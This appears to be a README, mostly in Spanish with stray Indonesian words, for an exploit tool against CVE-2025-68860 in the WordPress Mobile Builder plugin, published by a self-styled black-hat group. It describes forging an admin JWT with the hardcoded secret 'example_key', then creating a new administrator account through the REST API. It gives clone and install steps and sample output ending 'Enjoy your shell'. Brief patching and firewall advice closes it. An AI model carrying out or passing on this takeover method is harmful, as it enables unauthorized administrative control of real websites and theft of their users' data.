
Script de explotación para CVE-2025-68860 dirigido al plugin WordPress Mobile Builder. Genera tokens JWT falsificados usando una clave secreta hardcodeada para autenticarse como administrador y crear nuevas cuentas de administrador a través de la API REST.
El plugin WordPress Mobile builder versión 1.4.2 y anteriores tiene una vulnerabilidad de Autenticación Rota que permite a un atacante crear un token JWT válido con el secreto predeterminado "example_key" y autenticarse como admin (user_id=1). Con ese token, el atacante puede crear una nueva cuenta de administrador y tomar el control del sitio.
CVE: CVE-2025-68860
Causa: Uso de una clave secreta hardcodeada "example_key" para JWT, sin validación adecuada.
Ubicación de la Vulnerabilidad: En el plugin Mobile builder, el archivo que maneja la autenticación JWT (por ejemplo, class-jwt-auth.php) usa la constante JWT_SECRET con el valor predeterminado 'example_key'. Esta clave no se puede cambiar a través de la configuración, por lo que un atacante puede crear un token para cualquier user_id.
Impacto: El atacante puede crear un token para user_id=1 (admin), acceder al endpoint de la REST API y crear un nuevo usuario con rol de administrador.
CVSS: High (puntuación 8.8) - vector de red, no requiere interacción del usuario.
El script crea un token JWT con un payload que contiene user_id: 1 (admin) dan secret "example_key".
El token se usa para acceder a /wp-json/wp/v2/users/ para verificar el acceso de admin.
Si tiene éxito, el script envía una solicitud POST a /wp-json/wp/v2/users para crear un nuevo usuario con nombre de usuario dedsec1337, contraseña admin, correo electrónico [email protected] y rol de administrador.
La salida muestra las credenciales y la respuesta de la API.
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
El atacante puede crear una nueva cuenta de administrador, acceder a todas las funciones de WordPress, instalar plugins maliciosos, modificar contenido, robar datos de usuario o usar el sitio para ataques posteriores.
Esta vulnerabilidad puede ser explotada de forma remota sin autenticación previa.
Impacto: compromiso total del sitio WordPress.
Actualice inmediatamente el plugin Mobile builder a la última versión (>=1.4.3).
Si no hay actualización, desactive temporalmente el plugin.
Verifique si hay usuarios sospechosos en su sitio.
Utilice un firewall de aplicaciones web (WAF) para bloquear solicitudes sospechosas al endpoint de la REST API.
Como medida temporal, cambie la clave secreta en el código del plugin (si es posible) y restrinja el acceso a la REST API.